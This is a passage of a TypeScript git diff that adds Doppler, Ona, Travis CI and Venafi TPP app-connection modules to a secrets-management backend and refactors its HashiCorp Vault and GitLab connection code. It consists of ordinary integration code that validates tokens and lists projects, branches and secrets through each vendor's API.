GenericCreateAppConnectionFieldsSchema(AppConnection.Doppler) +); + +export const UpdateDopplerConnectionSchema = z + .object({ + credentials: DopplerConnectionApiTokenCredentialsSchema.optional().describe( + AppConnections.UPDATE(AppConnection.Doppler).credentials + ) + }) + .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.Doppler)); + +export const DopplerConnectionListItemSchema = z + .object({ + name: z.literal("Doppler"), + app: z.literal(AppConnection.Doppler), + methods: z.nativeEnum(DopplerConnectionMethod).array() + }) + .describe(JSON.stringify({ title: APP_CONNECTION_NAME_MAP[AppConnection.Doppler] })); diff --git a/backend/src/services/app-connection/doppler/doppler-connection-service.ts b/backend/src/services/app-connection/doppler/doppler-connection-service.ts new file mode 100644 index 00000000000..98c55a49359 --- /dev/null +++ 
b/backend/src/services/app-connection/doppler/doppler-connection-service.ts @@ -0,0 +1,61 @@ +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + getDopplerSecrets, + listDopplerConfigs, + listDopplerEnvironments, + listDopplerProjects +} from "./doppler-connection-fns"; +import { TDopplerConnection } from "./doppler-connection-types"; + +type TGetAppConnectionFunc = ( + app: AppConnection, + connectionId: string, + actor: OrgServiceActor +) => Promise; + +export const dopplerConnectionService = (getAppConnection: TGetAppConnectionFunc) => { + const listProjects = async (connectionId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.Doppler, connectionId, actor); + try { + return await listDopplerProjects(appConnection); + } catch (error) { + logger.error(error, "Failed to list projects for Doppler connection"); + return []; + } + }; + + const listEnvironments = async (connectionId: string, projectSlug: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.Doppler, connectionId, actor); + try { + return await listDopplerEnvironments(appConnection, projectSlug); + } catch (error) { + logger.error(error, "Failed to list environments for Doppler connection"); + return []; + } + }; + + const listConfigs = async (connectionId: string, projectSlug: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.Doppler, connectionId, actor); + try { + return await listDopplerConfigs(appConnection, projectSlug); + } catch (error) { + logger.error(error, "Failed to list configs for Doppler connection"); + return []; + } + }; + + const getSecrets = async ( + connectionId: string, + projectSlug: string, + environmentSlug: string, + actor: OrgServiceActor + ) => { + const appConnection = await getAppConnection(AppConnection.Doppler, 
connectionId, actor); + return getDopplerSecrets(appConnection, projectSlug, environmentSlug); + }; + + return { listProjects, listEnvironments, listConfigs, getSecrets }; +}; diff --git a/backend/src/services/app-connection/doppler/doppler-connection-types.ts b/backend/src/services/app-connection/doppler/doppler-connection-types.ts new file mode 100644 index 00000000000..e405d877d3f --- /dev/null +++ b/backend/src/services/app-connection/doppler/doppler-connection-types.ts @@ -0,0 +1,51 @@ +import z from "zod"; + +import { DiscriminativePick } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + CreateDopplerConnectionSchema, + DopplerConnectionSchema, + ValidateDopplerConnectionCredentialsSchema +} from "./doppler-connection-schema"; + +export type TDopplerConnection = z.infer; + +export type TDopplerConnectionInput = z.infer & { + app: AppConnection.Doppler; +}; + +export type TValidateDopplerConnectionCredentialsSchema = typeof ValidateDopplerConnectionCredentialsSchema; + +export type TDopplerConnectionConfig = DiscriminativePick & { + orgId: string; +}; + +export type TDopplerProject = { + id: string; + slug: string; + name: string; + description?: string | null; +}; + +export type TDopplerEnvironment = { + id: string; + slug: string; + name: string; + project: string; + initialFetchAt: string | null; + createdAt: string; +}; + +export type TDopplerConfig = { + name: string; + root: boolean; + locked: boolean; + environment: string; + project: string; +}; + +export type TDopplerSecret = { + raw: string | null; + computed: string | null; +}; diff --git a/backend/src/services/app-connection/doppler/index.ts b/backend/src/services/app-connection/doppler/index.ts new file mode 100644 index 00000000000..5ff3c4c11cb --- /dev/null +++ b/backend/src/services/app-connection/doppler/index.ts @@ -0,0 +1,5 @@ +export * from "./doppler-connection-enums"; +export * from "./doppler-connection-fns"; +export * from 
"./doppler-connection-schema"; +export * from "./doppler-connection-service"; +export * from "./doppler-connection-types"; diff --git a/backend/src/services/app-connection/gitlab/gitlab-connection-fns.ts b/backend/src/services/app-connection/gitlab/gitlab-connection-fns.ts index ca0833e40b7..37eeeaeb158 100644 --- a/backend/src/services/app-connection/gitlab/gitlab-connection-fns.ts +++ b/backend/src/services/app-connection/gitlab/gitlab-connection-fns.ts @@ -69,9 +69,19 @@ export const refreshGitLabToken = async ( kmsService: Pick, instanceUrl?: string ): Promise => { - const { INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID, INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET, SITE_URL } = - getConfig(); - if (!INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET || !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID || !SITE_URL) { + const { + INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID, + INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET, + SITE_URL, + isCloud + } = getConfig(); + if ( + !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET || + !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID || + !SITE_URL || + // Cloud instances do not support OAuth authentication + isCloud + ) { throw new InternalServerError({ message: `GitLab environment variables have not been configured` }); @@ -128,9 +138,18 @@ export const exchangeGitLabOAuthCode = async ( code: string, instanceUrl?: string ): Promise => { - const { INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID, INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET, SITE_URL } = - getConfig(); - if (!INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET || !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID || !SITE_URL) { + const { + INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID, + INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET, + SITE_URL, + isCloud + } = getConfig(); + if ( + !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET || + !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID || + !SITE_URL || + isCloud + ) { throw new InternalServerError({ message: `GitLab environment variables have not been 
configured` }); diff --git a/backend/src/services/app-connection/hc-vault/hc-vault-connection-fns.ts b/backend/src/services/app-connection/hc-vault/hc-vault-connection-fns.ts index 877b150a6a9..d50e4e9bfab 100644 --- a/backend/src/services/app-connection/hc-vault/hc-vault-connection-fns.ts +++ b/backend/src/services/app-connection/hc-vault/hc-vault-connection-fns.ts @@ -36,7 +36,7 @@ import { } from "./hc-vault-connection-types"; // HashiCorp Vault stores JSON data, so values can be any valid JSON type -type JsonValue = string | number | boolean | null | JsonValue[] | { [key: string]: JsonValue }; +export type JsonValue = string | number | boolean | null | JsonValue[] | { [key: string]: JsonValue }; export const convertVaultValueToString = (value: JsonValue): string => { if (value === null) { @@ -734,16 +734,25 @@ export const listHCVaultSecretPaths = async ( return allSecretPaths; }; -export const getHCVaultSecretsForPath = async ( - namespace: string, - secretPath: string, - connection: THCVaultConnection, - gatewayService: Pick, - gatewayV2Service: Pick -) => { - const instanceUrl = await getHCVaultInstanceUrl(connection); - const accessToken = await getHCVaultAccessToken(connection, gatewayService, gatewayV2Service); - +const fetchVaultSecretAtPath = async ({ + namespace, + secretPath, + mounts, + instanceUrl, + accessToken, + connection, + gatewayService, + gatewayV2Service +}: { + namespace: string; + secretPath: string; + mounts: Awaited>; + instanceUrl: string; + accessToken: string; + connection: THCVaultConnection; + gatewayService: Pick; + gatewayV2Service: Pick; +}): Promise> => { try { // Extract mount and path from the secretPath // secretPath format: {mount}/{path} @@ -757,8 +766,6 @@ export const getHCVaultSecretsForPath = async ( }); } - // Get mounts to determine KV version - const mounts = await listHCVaultMounts(connection, gatewayService, gatewayV2Service, namespace); const mount = mounts.find((m) => m.path.replace(/\/$/, "") === mountPath); if 
(!mount) { @@ -829,6 +836,37 @@ export const getHCVaultSecretsForPath = async ( } }; +export const getHCVaultSecretsForPaths = async ( + namespace: string, + secretPaths: string[], + connection: THCVaultConnection, + gatewayService: Pick, + gatewayV2Service: Pick +): Promise }>> => { + const instanceUrl = await getHCVaultInstanceUrl(connection); + const accessToken = await getHCVaultAccessToken(connection, gatewayService, gatewayV2Service); + const mounts = await listHCVaultMounts(connection, gatewayService, gatewayV2Service, namespace); + const limiter = createConcurrencyLimiter(HC_VAULT_CONCURRENCY_LIMIT); + + return Promise.all( + secretPaths.map((vaultSecretPath) => + limiter(async () => { + const secrets = await fetchVaultSecretAtPath({ + namespace, + secretPath: vaultSecretPath, + mounts, + instanceUrl, + accessToken, + connection, + gatewayService, + gatewayV2Service + }); + return { vaultSecretPath, secrets }; + }) + ) + ); +}; + export const getHCVaultAuthMounts = async ( namespace: string, authType: HCVaultAuthType | undefined, diff --git a/backend/src/services/app-connection/ona/index.ts b/backend/src/services/app-connection/ona/index.ts new file mode 100644 index 00000000000..88ebcf97f46 --- /dev/null +++ b/backend/src/services/app-connection/ona/index.ts @@ -0,0 +1,4 @@ +export * from "./ona-connection-enums"; +export * from "./ona-connection-fns"; +export * from "./ona-connection-schemas"; +export * from "./ona-connection-types"; diff --git a/backend/src/services/app-connection/ona/ona-connection-enums.ts b/backend/src/services/app-connection/ona/ona-connection-enums.ts new file mode 100644 index 00000000000..41cf8b38562 --- /dev/null +++ b/backend/src/services/app-connection/ona/ona-connection-enums.ts @@ -0,0 +1,3 @@ +export enum OnaConnectionMethod { + PersonalAccessToken = "personal-access-token" +} diff --git a/backend/src/services/app-connection/ona/ona-connection-fns.ts b/backend/src/services/app-connection/ona/ona-connection-fns.ts new file 
mode 100644 index 00000000000..e2514d8a79b --- /dev/null +++ b/backend/src/services/app-connection/ona/ona-connection-fns.ts @@ -0,0 +1,101 @@ +/* eslint-disable no-await-in-loop */ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { logger } from "@app/lib/logger"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; + +import { OnaConnectionMethod } from "./ona-connection-enums"; +import { TOnaConnection, TOnaConnectionConfig, TOnaProject, TOnaProjectListResponse } from "./ona-connection-types"; + +const GET_AUTHENTICATED_IDENTITY_PATH = "/gitpod.v1.IdentityService/GetAuthenticatedIdentity"; +const ONA_LIST_PROJECTS_PATH = "/gitpod.v1.ProjectService/ListProjects"; +const ONA_API_URL = "https://app.gitpod.io/api"; +const ONA_PAGE_SIZE = 100; + +export const getOnaConnectionListItem = () => { + return { + name: "Ona" as const, + app: AppConnection.Ona as const, + methods: Object.values(OnaConnectionMethod) as [OnaConnectionMethod.PersonalAccessToken] + }; +}; + +export const validateOnaConnectionCredentials = async (config: TOnaConnectionConfig) => { + const { credentials: inputCredentials } = config; + + try { + await request.post( + `${ONA_API_URL}${GET_AUTHENTICATED_IDENTITY_PATH}`, + {}, + { + headers: { + Authorization: `Bearer ${inputCredentials.personalAccessToken}`, + "Content-Type": "application/json" + } + } + ); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to validate credentials: ${ + error.response?.data ? 
JSON.stringify(error.response?.data) : error.message || "Unknown error" + }` + }); + } + throw new BadRequestError({ + message: `Unable to validate connection: ${(error as Error).message || "Verify credentials"}` + }); + } + + return inputCredentials; +}; + +export const listOnaProjects = async (appConnection: TOnaConnection): Promise => { + const { personalAccessToken } = appConnection.credentials; + + const allProjects: TOnaProject[] = []; + let token: string | undefined; + let hasMoreProjects = true; + + try { + while (hasMoreProjects) { + const body: { pagination: { pageSize: number; token?: string } } = { + pagination: { pageSize: ONA_PAGE_SIZE, ...(token ? { token } : {}) } + }; + + const { data } = await request.post(`${ONA_API_URL}${ONA_LIST_PROJECTS_PATH}`, body, { + headers: { + Authorization: `Bearer ${personalAccessToken}`, + "Content-Type": "application/json" + } + }); + + if (data?.projects?.length) { + allProjects.push( + ...data.projects.map((project) => ({ + id: project.id, + name: project.metadata?.name || "" + })) + ); + } + + token = data?.pagination?.nextToken || undefined; + hasMoreProjects = Boolean(token); + } + } catch (error) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to fetch Ona projects: ${ + error.response?.data ? 
JSON.stringify(error.response?.data) : error.message || "Unknown error" + }` + }); + } + throw error; + } + + logger.info({ allProjects }, "Ona projects fetched successfully"); + + return allProjects; +}; diff --git a/backend/src/services/app-connection/ona/ona-connection-schemas.ts b/backend/src/services/app-connection/ona/ona-connection-schemas.ts new file mode 100644 index 00000000000..5f6d76c8ac0 --- /dev/null +++ b/backend/src/services/app-connection/ona/ona-connection-schemas.ts @@ -0,0 +1,67 @@ +import z from "zod"; + +import { AppConnections } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + BaseAppConnectionSchema, + GenericCreateAppConnectionFieldsSchema, + GenericUpdateAppConnectionFieldsSchema +} from "@app/services/app-connection/app-connection-schemas"; + +import { APP_CONNECTION_NAME_MAP } from "../app-connection-maps"; +import { OnaConnectionMethod } from "./ona-connection-enums"; + +export const OnaConnectionPersonalAccessTokenCredentialsSchema = z.object({ + personalAccessToken: z + .string() + .trim() + .min(1, "Personal Access Token required") + .describe(AppConnections.CREDENTIALS.ONA.personalAccessToken) +}); + +const BaseOnaConnectionSchema = BaseAppConnectionSchema.extend({ + app: z.literal(AppConnection.Ona) +}); + +export const OnaConnectionSchema = BaseOnaConnectionSchema.extend({ + method: z.literal(OnaConnectionMethod.PersonalAccessToken), + credentials: OnaConnectionPersonalAccessTokenCredentialsSchema +}); + +export const SanitizedOnaConnectionSchema = z.discriminatedUnion("method", [ + BaseOnaConnectionSchema.extend({ + method: z.literal(OnaConnectionMethod.PersonalAccessToken), + credentials: OnaConnectionPersonalAccessTokenCredentialsSchema.pick({}) + }).describe(JSON.stringify({ title: `${APP_CONNECTION_NAME_MAP[AppConnection.Ona]} (Personal Access Token)` })) +]); + +export const ValidateOnaConnectionCredentialsSchema = z.discriminatedUnion("method", [ + 
z.object({ + method: z + .literal(OnaConnectionMethod.PersonalAccessToken) + .describe(AppConnections.CREATE(AppConnection.Ona).method), + credentials: OnaConnectionPersonalAccessTokenCredentialsSchema.describe( + AppConnections.CREATE(AppConnection.Ona).credentials + ) + }) +]); + +export const CreateOnaConnectionSchema = ValidateOnaConnectionCredentialsSchema.and( + GenericCreateAppConnectionFieldsSchema(AppConnection.Ona) +); + +export const UpdateOnaConnectionSchema = z + .object({ + credentials: OnaConnectionPersonalAccessTokenCredentialsSchema.optional().describe( + AppConnections.UPDATE(AppConnection.Ona).credentials + ) + }) + .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.Ona)); + +export const OnaConnectionListItemSchema = z + .object({ + name: z.literal("Ona"), + app: z.literal(AppConnection.Ona), + methods: z.nativeEnum(OnaConnectionMethod).array() + }) + .describe(JSON.stringify({ title: APP_CONNECTION_NAME_MAP[AppConnection.Ona] })); diff --git a/backend/src/services/app-connection/ona/ona-connection-service.ts b/backend/src/services/app-connection/ona/ona-connection-service.ts new file mode 100644 index 00000000000..bc2927dc228 --- /dev/null +++ b/backend/src/services/app-connection/ona/ona-connection-service.ts @@ -0,0 +1,28 @@ +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { listOnaProjects } from "./ona-connection-fns"; +import { TOnaConnection } from "./ona-connection-types"; + +type TGetAppConnectionFunc = ( + app: AppConnection, + connectionId: string, + actor: OrgServiceActor +) => Promise; + +export const onaConnectionService = (getAppConnection: TGetAppConnectionFunc) => { + const listProjects = async (connectionId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.Ona, connectionId, actor); + try { + return await listOnaProjects(appConnection); + } catch (error) { + 
logger.error(error, "Failed to establish connection with Ona"); + return []; + } + }; + + return { + listProjects + }; +}; diff --git a/backend/src/services/app-connection/ona/ona-connection-types.ts b/backend/src/services/app-connection/ona/ona-connection-types.ts new file mode 100644 index 00000000000..cd13cb10320 --- /dev/null +++ b/backend/src/services/app-connection/ona/ona-connection-types.ts @@ -0,0 +1,41 @@ +import z from "zod"; + +import { DiscriminativePick } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + CreateOnaConnectionSchema, + OnaConnectionSchema, + ValidateOnaConnectionCredentialsSchema +} from "./ona-connection-schemas"; + +export type TOnaConnection = z.infer; + +export type TOnaConnectionInput = z.infer & { + app: AppConnection.Ona; +}; + +export type TValidateOnaConnectionCredentialsSchema = typeof ValidateOnaConnectionCredentialsSchema; + +export type TOnaConnectionConfig = DiscriminativePick & { + orgId: string; +}; + +export type TOnaProject = { + id: string; + name: string; +}; + +export type TOnaRawProject = { + id: string; + metadata?: { + name?: string; + }; +}; + +export type TOnaProjectListResponse = { + projects: TOnaRawProject[]; + pagination?: { + nextToken?: string; + }; +}; diff --git a/backend/src/services/app-connection/travis-ci/index.ts b/backend/src/services/app-connection/travis-ci/index.ts new file mode 100644 index 00000000000..0649d781031 --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/index.ts @@ -0,0 +1,4 @@ +export * from "./travis-ci-connection-enums"; +export * from "./travis-ci-connection-fns"; +export * from "./travis-ci-connection-schemas"; +export * from "./travis-ci-connection-types"; diff --git a/backend/src/services/app-connection/travis-ci/travis-ci-connection-enums.ts b/backend/src/services/app-connection/travis-ci/travis-ci-connection-enums.ts new file mode 100644 index 00000000000..9e1a9644331 --- /dev/null +++ 
b/backend/src/services/app-connection/travis-ci/travis-ci-connection-enums.ts @@ -0,0 +1,3 @@ +export enum TravisCIConnectionMethod { + ApiToken = "api-token" +} diff --git a/backend/src/services/app-connection/travis-ci/travis-ci-connection-fns.ts b/backend/src/services/app-connection/travis-ci/travis-ci-connection-fns.ts new file mode 100644 index 00000000000..ea602b68367 --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/travis-ci-connection-fns.ts @@ -0,0 +1,153 @@ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { IntegrationUrls } from "@app/services/integration-auth/integration-list"; + +import { TravisCIConnectionMethod } from "./travis-ci-connection-enums"; +import { + TravisCIBranch, + TravisCIRepository, + TTravisCIConnection, + TTravisCIConnectionConfig +} from "./travis-ci-connection-types"; + +const travisCIApiHeaders = (apiToken: string) => ({ + Authorization: `token ${apiToken}`, + "Travis-API-Version": "3", + Accept: "application/json" +}); + +type TravisCIPaginationMeta = { + is_last?: boolean; + next?: { "@href": string } | null; +}; + +const resolveNextTravisCIUrl = (pagination: TravisCIPaginationMeta | undefined): string | undefined => { + const nextHref = pagination?.next?.["@href"]; + if (pagination?.is_last || !nextHref) return undefined; + return nextHref.startsWith("http") ? 
nextHref : `${IntegrationUrls.TRAVISCI_API_URL}${nextHref}`; +}; + +export const getTravisCIConnectionListItem = () => { + return { + name: "Travis CI" as const, + app: AppConnection.TravisCI as const, + methods: Object.values(TravisCIConnectionMethod) as [TravisCIConnectionMethod.ApiToken] + }; +}; + +export const validateTravisCIConnectionCredentials = async (config: TTravisCIConnectionConfig) => { + const { credentials: inputCredentials } = config; + + try { + await request.get(`${IntegrationUrls.TRAVISCI_API_URL}/user`, { + headers: travisCIApiHeaders(inputCredentials.apiToken) + }); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to validate credentials: ${ + error.response?.data ? JSON.stringify(error.response?.data) : error.message || "Unknown error" + }` + }); + } + throw new BadRequestError({ + message: `Unable to validate connection: ${(error as Error).message || "Verify credentials"}` + }); + } + + return inputCredentials; +}; + +export const listTravisCIRepositories = async (appConnection: TTravisCIConnection): Promise => { + const { + credentials: { apiToken } + } = appConnection; + + try { + type TravisCIRepositoriesResponse = { + "@pagination"?: TravisCIPaginationMeta; + repositories?: { id: string | number; slug: string }[]; + }; + + const allRepos: { id: string | number; slug: string }[] = []; + let nextUrl: string | undefined = `${IntegrationUrls.TRAVISCI_API_URL}/repos`; + + while (nextUrl) { + // eslint-disable-next-line no-await-in-loop + const { data }: { data: TravisCIRepositoriesResponse } = await request.get(nextUrl, { + headers: travisCIApiHeaders(apiToken) + }); + + if (Array.isArray(data.repositories)) { + allRepos.push(...data.repositories); + } + + nextUrl = resolveNextTravisCIUrl(data["@pagination"]); + } + + return allRepos.map((repo) => ({ + id: String(repo.id), + slug: repo.slug, + name: repo.slug?.split("/")[1] ?? 
repo.slug + })); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to fetch Travis CI repositories: ${ + error.response?.data ? JSON.stringify(error.response?.data) : error.message || "Unknown error" + }` + }); + } + throw error; + } +}; + +export const listTravisCIBranches = async ( + appConnection: TTravisCIConnection, + repositoryId: string +): Promise => { + const { + credentials: { apiToken } + } = appConnection; + + try { + type TravisCIBranchesResponse = { + "@pagination"?: TravisCIPaginationMeta; + branches?: { name: string; default_branch?: boolean }[]; + }; + + const allBranches: { name: string; default_branch?: boolean }[] = []; + let nextUrl: string | undefined = + `${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodeURIComponent(repositoryId)}/branches`; + + while (nextUrl) { + // eslint-disable-next-line no-await-in-loop + const { data }: { data: TravisCIBranchesResponse } = await request.get(nextUrl, { + headers: travisCIApiHeaders(apiToken) + }); + + if (Array.isArray(data.branches)) { + allBranches.push(...data.branches); + } + + nextUrl = resolveNextTravisCIUrl(data["@pagination"]); + } + + return allBranches.map((branch) => ({ + name: branch.name, + isDefault: Boolean(branch.default_branch) + })); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to fetch Travis CI branches: ${ + error.response?.data ? 
JSON.stringify(error.response?.data) : error.message || "Unknown error" + }` + }); + } + throw error; + } +}; diff --git a/backend/src/services/app-connection/travis-ci/travis-ci-connection-schemas.ts b/backend/src/services/app-connection/travis-ci/travis-ci-connection-schemas.ts new file mode 100644 index 00000000000..989d7dd4db5 --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/travis-ci-connection-schemas.ts @@ -0,0 +1,61 @@ +import z from "zod"; + +import { AppConnections } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + BaseAppConnectionSchema, + GenericCreateAppConnectionFieldsSchema, + GenericUpdateAppConnectionFieldsSchema +} from "@app/services/app-connection/app-connection-schemas"; + +import { APP_CONNECTION_NAME_MAP } from "../app-connection-maps"; +import { TravisCIConnectionMethod } from "./travis-ci-connection-enums"; + +export const TravisCIConnectionAccessTokenCredentialsSchema = z.object({ + apiToken: z.string().trim().min(1, "API Token required").describe(AppConnections.CREDENTIALS.TRAVISCI.apiToken) +}); + +const BaseTravisCIConnectionSchema = BaseAppConnectionSchema.extend({ + app: z.literal(AppConnection.TravisCI) +}); + +export const TravisCIConnectionSchema = BaseTravisCIConnectionSchema.extend({ + method: z.literal(TravisCIConnectionMethod.ApiToken), + credentials: TravisCIConnectionAccessTokenCredentialsSchema +}); + +export const SanitizedTravisCIConnectionSchema = z.discriminatedUnion("method", [ + BaseTravisCIConnectionSchema.extend({ + method: z.literal(TravisCIConnectionMethod.ApiToken), + credentials: TravisCIConnectionAccessTokenCredentialsSchema.pick({}) + }).describe(JSON.stringify({ title: `${APP_CONNECTION_NAME_MAP[AppConnection.TravisCI]} (API Token)` })) +]); + +export const ValidateTravisCIConnectionCredentialsSchema = z.discriminatedUnion("method", [ + z.object({ + method: 
z.literal(TravisCIConnectionMethod.ApiToken).describe(AppConnections.CREATE(AppConnection.TravisCI).method), + credentials: TravisCIConnectionAccessTokenCredentialsSchema.describe( + AppConnections.CREATE(AppConnection.TravisCI).credentials + ) + }) +]); + +export const CreateTravisCIConnectionSchema = ValidateTravisCIConnectionCredentialsSchema.and( + GenericCreateAppConnectionFieldsSchema(AppConnection.TravisCI) +); + +export const UpdateTravisCIConnectionSchema = z + .object({ + credentials: TravisCIConnectionAccessTokenCredentialsSchema.optional().describe( + AppConnections.UPDATE(AppConnection.TravisCI).credentials + ) + }) + .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.TravisCI)); + +export const TravisCIConnectionListItemSchema = z + .object({ + name: z.literal("Travis CI"), + app: z.literal(AppConnection.TravisCI), + methods: z.nativeEnum(TravisCIConnectionMethod).array() + }) + .describe(JSON.stringify({ title: APP_CONNECTION_NAME_MAP[AppConnection.TravisCI] })); diff --git a/backend/src/services/app-connection/travis-ci/travis-ci-connection-service.ts b/backend/src/services/app-connection/travis-ci/travis-ci-connection-service.ts new file mode 100644 index 00000000000..10c350f7339 --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/travis-ci-connection-service.ts @@ -0,0 +1,39 @@ +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { listTravisCIBranches, listTravisCIRepositories } from "./travis-ci-connection-fns"; +import { TTravisCIConnection } from "./travis-ci-connection-types"; + +type TGetAppConnectionFunc = ( + app: AppConnection, + connectionId: string, + actor: OrgServiceActor +) => Promise; + +export const travisCIConnectionService = (getAppConnection: TGetAppConnectionFunc) => { + const listRepositories = async (connectionId: string, actor: OrgServiceActor) => { + const appConnection = await 
getAppConnection(AppConnection.TravisCI, connectionId, actor); + try { + return await listTravisCIRepositories(appConnection); + } catch (error) { + logger.error(error, "Failed to list Travis CI repositories"); + return []; + } + }; + + const listBranches = async (connectionId: string, repositoryId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.TravisCI, connectionId, actor); + try { + return await listTravisCIBranches(appConnection, repositoryId); + } catch (error) { + logger.error(error, "Failed to list Travis CI branches"); + return []; + } + }; + + return { + listRepositories, + listBranches + }; +}; diff --git a/backend/src/services/app-connection/travis-ci/travis-ci-connection-types.ts b/backend/src/services/app-connection/travis-ci/travis-ci-connection-types.ts new file mode 100644 index 00000000000..d1067591cad --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/travis-ci-connection-types.ts @@ -0,0 +1,36 @@ +import z from "zod"; + +import { DiscriminativePick } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + CreateTravisCIConnectionSchema, + TravisCIConnectionSchema, + ValidateTravisCIConnectionCredentialsSchema +} from "./travis-ci-connection-schemas"; + +export type TTravisCIConnection = z.infer; + +export type TTravisCIConnectionInput = z.infer & { + app: AppConnection.TravisCI; +}; + +export type TValidateTravisCIConnectionCredentialsSchema = typeof ValidateTravisCIConnectionCredentialsSchema; + +export type TTravisCIConnectionConfig = DiscriminativePick< + TTravisCIConnectionInput, + "method" | "app" | "credentials" +> & { + orgId: string; +}; + +export type TravisCIRepository = { + id: string; + name: string; + slug: string; +}; + +export type TravisCIBranch = { + name: string; + isDefault: boolean; +}; diff --git a/backend/src/services/app-connection/venafi-tpp/index.ts b/backend/src/services/app-connection/venafi-tpp/index.ts new file 
mode 100644 index 00000000000..596acec3f76 --- /dev/null +++ b/backend/src/services/app-connection/venafi-tpp/index.ts @@ -0,0 +1,4 @@ +export * from "./venafi-tpp-connection-enums"; +export * from "./venafi-tpp-connection-fns"; +export * from "./venafi-tpp-connection-schemas"; +export * from "./venafi-tpp-connection-types"; diff --git a/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-enums.ts b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-enums.ts new file mode 100644 index 00000000000..5cdd3a1f04f --- /dev/null +++ b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-enums.ts @@ -0,0 +1,3 @@ +export enum VenafiTppConnectionMethod { + OAuth = "oauth" +} diff --git a/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-fns.ts b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-fns.ts new file mode 100644 index 00000000000..2ffdfef1b7d --- /dev/null +++ b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-fns.ts @@ -0,0 +1,233 @@ +import { AxiosError, AxiosRequestConfig, AxiosResponse } from "axios"; +import https from "https"; +import RE2 from "re2"; + +import { verifyHostInputValidity } from "@app/ee/services/dynamic-secret/dynamic-secret-fns"; +import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { GatewayProxyProtocol } from "@app/lib/gateway"; +import { withGatewayV2Proxy } from "@app/lib/gateway-v2/gateway-v2"; +import { logger } from "@app/lib/logger"; +import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator/validate-url"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; + +import { VenafiTppConnectionMethod } from "./venafi-tpp-connection-enums"; +import { TVenafiTppConnectionConfig } from "./venafi-tpp-connection-types"; + +type TVenafiTppCredentials 
= { + tppUrl: string; + clientId: string; + username: string; + password: string; +}; + +type TVenafiTppOAuthResponse = { + access_token: string; + refresh_token: string; + expires_in: number; + expires: number; + token_type: string; + scope: string; + identity: string; +}; + +/** + * Normalizes the TPP base URL by removing trailing slashes + */ +const normalizeTppUrl = (tppUrl: string): string => { + return tppUrl.replace(new RE2("\\/+$"), ""); +}; + +/** + * Issues an HTTP request to the Venafi TPP server, routing through the configured + * gateway transport when the connection has a gatewayId set. + */ +export const requestWithVenafiTppGateway = async ( + appConnection: { gatewayId?: string | null }, + gatewayV2Service: Pick, + requestConfig: AxiosRequestConfig +): Promise> => { + const { gatewayId } = appConnection; + + const url = new URL(requestConfig.url as string); + await blockLocalAndPrivateIpAddresses(url.toString(), Boolean(gatewayId)); + + if (!gatewayId) { + return request.request(requestConfig); + } + + const [targetHost] = await verifyHostInputValidity({ host: url.hostname, isGateway: true, isDynamicSecret: false }); 